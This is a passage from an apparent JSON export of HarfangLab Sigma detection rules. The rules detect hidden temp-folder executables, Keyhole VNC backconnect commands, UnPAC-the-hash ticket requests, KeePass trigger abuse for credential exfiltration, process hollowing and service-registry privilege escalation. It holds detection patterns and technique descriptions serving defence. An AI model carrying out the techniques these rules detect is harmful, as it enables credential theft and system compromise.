"content": "title: Hidden File Execution from Temporary Paths\nid: 6b6a4571-da9f-4a59-95d2-54764f10e54d\ndescription: |\n Detects the execution of a file that is hidden or in a hidden directory from a temporary folder.\n This could be used by an attacker to try and evade detection and hide their traces, as temporary folders are cleaned on reboot.\n It is recommended to analyze the parent process for suspicious activities and to determine if the executed binary is legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md\n - https://attack.mitre.org/techniques/T1564/001/\ndate: 2021/10/11\nmodified: 2025/02/12\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.execution\n - attack.t1564.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|startswith:\n - '/tmp/.'\n - '/var/tmp/.'\n - '/tmp/*/.'\n - '/var/tmp/*/.'\n\n # Systemd mounts some appimages and other similar binary-as-devices in `/tmp/.mount_xxxxx/`.\n filter_tmp_mounts:\n Image|startswith:\n - '/tmp/.mount_*/'\n - '/var/tmp/.mount_*/'\n\n exclusion_oracle:\n Image: '/tmp/RU_Oracle/gateways/install/.oui'\n\n exclusion_java:\n ParentImage|endswith: '/jre/bin/java'\n\n exclusion_heroku:\n Image|endswith: '/tmp/build/.heroku/node/bin/node'\n\n exclusion_dropbox:\n Image: '/tmp/.dropbox-*/.dropbox-dist/dropbox-*/dropbox'\n\n exclusion_node:\n ParentImage: '/usr/local/bin/node'\n\n exclusion_maturin:\n Image|endswith: '/bin/maturin'\n CommandLine|contains: 'build-wheel'\n\n exclusion_terraform:\n Image|startswith:\n - '/tmp/tmp.*/.terraform/providers/registry.terraform.io/'\n - '/tmp/provider.tf??????????/.terraform/providers/registry.terraform.io'\n - '/tmp/tf/.terraform/providers/registry.'\n - '/tmp/dev-platform-deploy/terragrunt/'\n\n exclusion_pip_meson:\n Image:\n - 
'/tmp/pip-install-????????/*/.mesonpy-????????/meson-private/sanitycheckc.exe'\n - '/tmp/pip-install-????????/*/.mesonpy-????????/meson-private/sanitycheckcpp.exe'\n\n exclusion_constgen:\n Image: '/tmp/.const_generator????????-???????-??????.bin'\n\n exclusion_vmware:\n Image: '/tmp/.vmware-sysinfo-????????????????/vmware-sysinfo'\n\n exclusion_sap:\n Image: '/tmp/.SAPOSCOL_*_*.EXE'\n ParentImage: '/usr/sap/hostctrl/exe/saposcol'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6b6a4571-da9f-4a59-95d2-54764f10e54d",
"rule_name": "Hidden File Execution from Temporary Paths",
"rule_description": "Detects the execution of a file that is hidden or in a hidden directory from a temporary folder.\nThis could be used by an attacker to try and evade detection and hide their traces, as temporary folders are cleaned on reboot.\nIt is recommended to analyze the parent process for suspicious activities and to determine if the executed binary is legitimate.\n",
"rule_creation_date": "2021-10-11",
"rule_modified_date": "2025-02-12",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1564.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6b8fcfbc-7430-4b29-b1bb-4e65bee98aec",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079042Z",
"creation_date": "2026-03-23T11:45:34.079044Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079048Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://medium.com/walmartglobaltech/keyhole-analysis-60302922aa03",
"https://malpedia.caad.fkie.fraunhofer.de/details/win.keyhole",
"https://blog.nviso.eu/2023/03/20/icedids-vnc-backdoors-dark-cat-anubis-keyhole/",
"https://www.trendmicro.com/fr_fr/research/25/b/black-basta-cactus-ransomware-backconnect.html",
"https://attack.mitre.org/techniques/T1021/005/"
],
"name": "t1021_005_keyhole_vnc_command_executed.yml",
"content": "title: Keyhole VNC Command Executed\nid: 6b8fcfbc-7430-4b29-b1bb-4e65bee98aec\ndescription: |\n Detects commands executed through the Keyhole VNC module, also named BackConnect module.\n Keyhole is a multi-functional backconnect component used to establish and maintain persistent control over compromised systems.\n This module is especially used by ransomware groups and is related to trojans like IcedID, Qakbot, TrickBot and Latrodectus.\n It is recommended to check for injected threads and to review network connections of the grandparent process, as well as to investigate the command executed.\nreferences:\n - https://medium.com/walmartglobaltech/keyhole-analysis-60302922aa03\n - https://malpedia.caad.fkie.fraunhofer.de/details/win.keyhole\n - https://blog.nviso.eu/2023/03/20/icedids-vnc-backdoors-dark-cat-anubis-keyhole/\n - https://www.trendmicro.com/fr_fr/research/25/b/black-basta-cactus-ransomware-backconnect.html\n - https://attack.mitre.org/techniques/T1021/005/\ndate: 2025/07/09\nmodified: 2025/08/05\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.005\n - attack.execution\n - attack.t1059.001\n - attack.t1059.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Trojan.Keyhole\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentCommandLine:\n - 'cmd.exe /K chcp 65001 && c: && cd c:\\'\n - 'powershell.exe -c \"[Console]::OutputEncoding = [Console]::InputEncoding = [System.Text.Encoding]::GetEncoding(?utf-8?); cd c:\\; powershell\"'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6b8fcfbc-7430-4b29-b1bb-4e65bee98aec",
"rule_name": "Keyhole VNC Command Executed",
"rule_description": "Detects commands executed through the Keyhole VNC module, also named BackConnect module.\nKeyhole is a multi-functional backconnect component used to establish and maintain persistent control over compromised systems.\nThis module is especially used by ransomware groups and is related to trojans like IcedID, Qakbot, TrickBot and Latrodectus.\nIt is recommended to check for injected threads and to review network connections of the grandparent process, as well as to investigate the command executed.\n",
"rule_creation_date": "2025-07-09",
"rule_modified_date": "2025-08-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.005",
"attack.t1059.001",
"attack.t1059.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6ba77b38-d3e5-4842-ae46-fde9082b97af",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086333Z",
"creation_date": "2026-03-23T11:45:34.086335Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086339Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://medium.com/falconforce/falconfriday-detecting-unpacing-and-shadowed-credentials-0xff1e-2246934247ce",
"https://www.thehacker.recipes/ad/movement/kerberos/unpac-the-hash",
"https://attack.mitre.org/techniques/T1649/"
],
"name": "t1649_unpac_the_hash.yml",
"content": "title: UnPAC the Hash\nid: 6ba77b38-d3e5-4842-ae46-fde9082b97af\ndescription: |\n Detects a suspicious service ticket request with the `ENC-TKT-IN-SKEY` flag option linked to the UnPAC-the-hash attack.\n UnPAC-the-hash lets an attacker with a valid Kerberos TGT — and the ability to sign tickets as the user (e.g., via the user’s private key, Shadow Credentials, or a Golden Certificate) — extract that user’s NTLM (and legacy LM) password hashes.\n By abusing PAC validation and forged tickets, the technique converts Kerberos authentication material into reusable NTLM hashes for lateral movement and pass-the-hash attacks.\n The result is credential theft that can enable persistent and high-privilege domain compromise.\n It is recommended to pivot to the source IP for suspicious activities.\nreferences:\n - https://medium.com/falconforce/falconfriday-detecting-unpacing-and-shadowed-credentials-0xff1e-2246934247ce\n - https://www.thehacker.recipes/ad/movement/kerberos/unpac-the-hash\n - https://attack.mitre.org/techniques/T1649/\ndate: 2024/11/08\nmodified: 2025/11/04\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1649\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.ActiveDirectory\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n EventID: 4769\n TicketOptions:\n - '0x40810018' # Certipy --> Forwardable | Renewable | Canonicalize | Enc_tkt_in_skey | Renewable_ok\n - '0x40800018' # Kekeo --> Forwardable | Renewable | Enc_tkt_in_skey | Renewable_ok\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6ba77b38-d3e5-4842-ae46-fde9082b97af",
"rule_name": "UnPAC the Hash",
"rule_description": "Detects a suspicious service ticket request with the `ENC-TKT-IN-SKEY` flag option linked to the UnPAC-the-hash attack.\nUnPAC-the-hash lets an attacker with a valid Kerberos TGT — and the ability to sign tickets as the user (e.g., via the user’s private key, Shadow Credentials, or a Golden Certificate) — extract that user’s NTLM (and legacy LM) password hashes.\nBy abusing PAC validation and forged tickets, the technique converts Kerberos authentication material into reusable NTLM hashes for lateral movement and pass-the-hash attacks.\nThe result is credential theft that can enable persistent and high-privilege domain compromise.\nIt is recommended to pivot to the source IP for suspicious activities.\n",
"rule_creation_date": "2024-11-08",
"rule_modified_date": "2025-11-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1649"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6bab01c3-5165-4dfd-a77a-42077f50025a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.297227Z",
"creation_date": "2026-03-23T11:45:35.297229Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.297233Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://www.kali.org/docs/wsl/",
"https://blog.qualys.com/vulnerabilities-threat-research/2022/03/22/implications-of-windows-subsystem-for-linux-for-adversaries-defenders-part-1",
"https://en.wikipedia.org/wiki/Windows_Subsystem_for_Linux",
"https://attack.mitre.org/techniques/T1202/"
],
"name": "t1202_wsl_hacking_distribution_execution.yml",
"content": "title: Hacking Distribution Executed Under WSL\nid: 6bab01c3-5165-4dfd-a77a-42077f50025a\ndescription: |\n Detects the execution of various Linux hacking distributions through WSL (Windows Subsystem For Linux).\n Popular hacking distributions provide pre-installed penetration testing and security assessment tools that could be leveraged for malicious purposes.\n Threat actors may abuse WSL to evade Windows security controls and execute malicious code.\n It is recommended to monitor process trees and subsequent WSL activities for signs of malicious behavior.\nreferences:\n - https://www.kali.org/docs/wsl/\n - https://blog.qualys.com/vulnerabilities-threat-research/2022/03/22/implications-of-windows-subsystem-for-linux-for-adversaries-defenders-part-1\n - https://en.wikipedia.org/wiki/Windows_Subsystem_for_Linux\n - https://attack.mitre.org/techniques/T1202/\ndate: 2026/03/03\nmodified: 2026/03/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1202\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_process:\n ProcessImage:\n - '?:\\Program Files\\WindowsApps\\KaliLinux*\\kali.exe'\n - '?:\\Program Files\\WindowsApps\\\\*Voza.AthenaOS*\\athena.exe'\n ProcessParentImage: '?:\\Program Files\\WSL\\wsl.exe'\n\n selection_commandline:\n ProcessImage: '?:\\Program Files\\WSL\\wsl.exe'\n ProcessCommandLine|contains:\n - '-d kali-linux'\n - '-d Athena'\n - '-d ParrotOS'\n\n condition: 1 of selection_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6bab01c3-5165-4dfd-a77a-42077f50025a",
"rule_name": "Hacking Distribution Executed Under WSL",
"rule_description": "Detects the execution of well-known Linux penetration-testing distributions (Kali Linux, Athena OS, ParrotOS) through WSL (Windows Subsystem for Linux), either via the distribution launcher spawned by wsl.exe or via a wsl.exe command line selecting the distribution with -d.\nThese distributions ship pre-installed penetration testing and security assessment tools that could be leveraged for malicious purposes.\nThreat actors may abuse WSL to evade Windows security controls and execute malicious code.\nIt is recommended to check whether the user is an authorized security tester and to monitor the process tree and subsequent WSL activity for signs of malicious behavior.\n",
"rule_creation_date": "2026-03-03",
"rule_modified_date": "2026-03-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1202"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6bebbdc8-ffec-4e3d-8572-19125a63f092",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079354Z",
"creation_date": "2026-03-23T11:45:34.079356Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079361Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/alt3kx/CVE-2023-24055_PoC",
"https://keepass.info/help/kb/trigger_examples.html"
],
"name": "t1555_suspicious_process_parent_keepass.yml",
"content": "title: Suspicious Process Launched by KeePass\nid: 6bebbdc8-ffec-4e3d-8572-19125a63f092\ndescription: |\n Detects execution of a suspicious process launched by KeePass.exe that can be the result of a trigger action.\n KeePass allows to configure triggers to automatically launch actions based on different events.\n Attackers can modify the KeePass configuration file KeePass.config.xml to add malicious triggers, for example, to exfiltrate the credentials to an attacker controlled server.\n The CVE 2023-24055 is known to exploit this feature.\n It is recommended to analyze the execution command to look for signs of exfiltration or data theft.\nreferences:\n - https://github.com/alt3kx/CVE-2023-24055_PoC\n - https://keepass.info/help/kb/trigger_examples.html\ndate: 2023/01/27\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546\n - attack.credential_access\n - attack.t1555\n - attack.collection\n - attack.t1119\n - attack.exfiltration\n - attack.t1020.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\KeePass.exe'\n Image|startswith: '?:\\'\n\n exclusion_common:\n Image:\n - '?:\\Program Files\\\\*'\n - '?:\\Program Files (x86)\\\\*'\n - '?:\\Windows\\Explorer.exe'\n - '?:\\windows\\system32\\WerFault.exe'\n - '?:\\Windows\\SysWOW64\\WerFault.exe'\n - '*\\chrome.exe'\n - '*\\firefox.exe'\n - '*\\brave.exe'\n - '*\\sidekick.exe'\n - '*\\putty.exe'\n - '*\\PuTTY\\pageant.exe'\n - '*\\WinSCP\\WinSCP.exe'\n - '*\\KeePass-*\\KeePass.exe'\n - '?:\\Windows\\System32\\mstsc.exe'\n - '*\\AppData\\Local\\KeeForm\\AutoIt3.exe'\n - '*\\AppData\\Local\\Programs\\Opera\\launcher.exe'\n - '?:\\Windows\\System32\\Fondue.exe'\n - '*\\AppData\\Local\\Programs\\Opera 
GX\\launcher.exe'\n - '?:\\Windows\\Microsoft.NET\\Framework64\\v*\\csc.exe'\n - '?:\\Windows\\System32\\OpenSSH\\ssh.exe'\n - '?:\\Windows\\System32\\bdeunlock.exe'\n - '*\\AppData\\Local\\Programs\\Opera\\opera.exe'\n - '*\\AppData\\Local\\Programs\\Opera GX\\opera.exe'\n - '*\\AppData\\Local\\Vivaldi\\Application\\vivaldi.exe'\n - '*\\Keepass\\KeePass\\Applications\\Chromium\\chrome.exe'\n - '*\\Keepass\\KeePass\\Applications\\Kitty\\kitty_portable.exe'\n - '*\\AppData\\Local\\Chromium\\Application\\chrome.exe'\n\n exclusion_rundll32:\n CommandLine:\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\mshtml.dll,PrintHTML *'\n - '?:\\Windows\\system32\\rundll32.exe cryptext.dll,CryptExtOpenCER ?:\\Users\\\\*'\n - '?:\\windows\\system32\\rundll32.exe cryptext.dll,CryptExtAddPFX ?:\\Users\\\\*'\n - '?:\\WINDOWS\\system32\\rundll32.exe ndfapi.dll,NdfRunDllDiagnoseWithAnswerFile NetworkDiagnosticsSharing ?:\\Users\\\\*'\n - 'rundll32 ?:\\WINDOWS\\system32\\spool\\DRIVERS\\x64\\3\\\\*,MonitorPrintJobStatus *'\n\n exclusion_cmdkey:\n CommandLine: '?:\\Windows\\System32\\cmd.exe /c cmdkey /generic:*TERMSRV/* && timeout * && cmdkey /delete*'\n\n exclusion_keepass1:\n OriginalFileName: 'KeePass.exe'\n Signed: 'true'\n Signature: 'Open Source Developer, Dominik Reichl'\n\n exclusion_keepass2:\n Name: 'KeePass.tmp'\n Description: 'Setup/Uninstall'\n\n exclusion_osk:\n OriginalFileName: 'osk.exe'\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n # https://www.joeware.net/freetools/tools/cpau/index.htm\n exclusion_cpau:\n Image|endswith: '\\CPAU.exe'\n Company: 'www.joeware.net'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6bebbdc8-ffec-4e3d-8572-19125a63f092",
"rule_name": "Suspicious Process Launched by KeePass",
"rule_description": "Detects execution of a suspicious process launched by KeePass.exe that can be the result of a trigger action.\nKeePass allows configuring triggers that automatically launch actions in response to various events.\nAttackers with write access to the KeePass configuration file KeePass.config.xml can add malicious triggers, for example to export and exfiltrate the stored credentials to an attacker-controlled server.\nThis abuse of the trigger feature is tracked as CVE-2023-24055.\nIt is recommended to analyze the command line of the child process for signs of credential export, exfiltration or data theft.\n",
"rule_creation_date": "2023-01-27",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.credential_access",
"attack.exfiltration",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1020.001",
"attack.t1119",
"attack.t1546",
"attack.t1555"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6c0a05e4-4c36-4aa7-b69f-43d675d98d73",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075215Z",
"creation_date": "2026-03-23T11:45:34.075217Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075222Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_sacrificial_process_vbc.yml",
"content": "title: Vbc.exe Sacrificial Process Spawned\nid: 6c0a05e4-4c36-4aa7-b69f-43d675d98d73\ndescription: |\n Detects the suspicious execution of the legitimate .NET Framework binary vbc.exe, spawned without arguments and in an abnormal execution context.\n This can mean that the binary is being used as a sacrificial or hollowed process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n This technique is used, for instance, by the Vidar malware.\n It is recommended to investigate the parent process performing this action and the destination IP address of the vbc.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/05/13\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProcessTampering\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine: '?:\\Windows\\Microsoft.NET\\Framework\\v*\\vbc.exe'\n\n filter_ngen:\n CommandLine|startswith: '?:\\Windows\\Microsoft.NET\\framework\\v*\\ngen.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6c0a05e4-4c36-4aa7-b69f-43d675d98d73",
"rule_name": "Vbc.exe Sacrificial Process Spawned",
"rule_description": "Detects the suspicious execution of the legitimate .NET Framework binary vbc.exe, spawned without arguments and in an abnormal execution context.\nThis can mean that the binary is being used as a sacrificial or hollowed process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nThis technique is used, for instance, by the Vidar malware.\nIt is recommended to investigate the parent process performing this action and the destination IP address of the vbc.exe process to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2024-05-13",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6c11d396-ac4b-440d-ba67-ffb304d6e65d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.596089Z",
"creation_date": "2026-03-23T11:45:34.596092Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.596099Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1068_process_unprivileged_user_modifying_service_registry_config.yml",
"content": "title: Unprivileged User Modified Service Registry Configuration in Command-line\nid: 6c11d396-ac4b-440d-ba67-ffb304d6e65d\ndescription: |\n Detects command-line modifications (reg.exe or PowerShell) of service configuration values such as ImagePath, ServiceDll or FailureCommand under the Services registry hive, performed by a process running at Low or Medium integrity level.\n Such modifications can be indicative of malicious activity, as attackers exploit weak permissions on service registry keys to have their own binary executed by a service that runs with higher privileges.\n Registry keys controlling service configurations are particularly sensitive, as unauthorized changes can lead to service misbehavior or privilege escalation.\n It is recommended to investigate the modified registry key to identify any unauthorized changes and check whether the modification leads to a privilege escalation.\nreferences:\n - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\n - https://attack.mitre.org/techniques/T1068/\ndate: 2022/09/07\nmodified: 2025/02/11\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - attack.persistence\n - attack.t1574.011\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_integrity:\n IntegrityLevel:\n - 'Low'\n - 'Medium'\n\n selection_reg:\n OriginalFileName: 'reg.exe'\n CommandLine|contains: 'add'\n\n selection_powershell:\n OriginalFileName: 'powershell.exe'\n CommandLine|contains:\n - 'set-itemproperty'\n - ' sp '\n - 'new-itemproperty'\n\n selection_args_1:\n CommandLine|contains|all:\n - 'ControlSet'\n - 'Services'\n\n selection_args_2:\n CommandLine|contains:\n - 'ImagePath'\n - 'FailureCommand'\n - 'ServiceDll'\n\n condition: selection_integrity and (selection_reg or selection_powershell) and all of selection_args_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6c11d396-ac4b-440d-ba67-ffb304d6e65d",
"rule_name": "Unprivileged User Modified Service Registry Configuration in Command-line",
"rule_description": "Detects command-line modifications (reg.exe or PowerShell) of service configuration values such as ImagePath, ServiceDll or FailureCommand under the Services registry hive, performed by a process running at Low or Medium integrity level.\nSuch modifications can be indicative of malicious activity, as attackers exploit weak permissions on service registry keys to have their own binary executed by a service that runs with higher privileges.\nRegistry keys controlling service configurations are particularly sensitive, as unauthorized changes can lead to service misbehavior or privilege escalation.\nIt is recommended to investigate the modified registry key to identify any unauthorized changes and check whether the modification leads to a privilege escalation.\n",
"rule_creation_date": "2022-09-07",
"rule_modified_date": "2025-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068",
"attack.t1574.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6c31932d-344c-4c67-80a3-09ee90425956",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606625Z",
"creation_date": "2026-03-23T11:45:34.606628Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606636Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Kevin-Robertson/Powermad",
"https://www.netspi.com/blog/technical/network-penetration-testing/exploiting-adidns/",
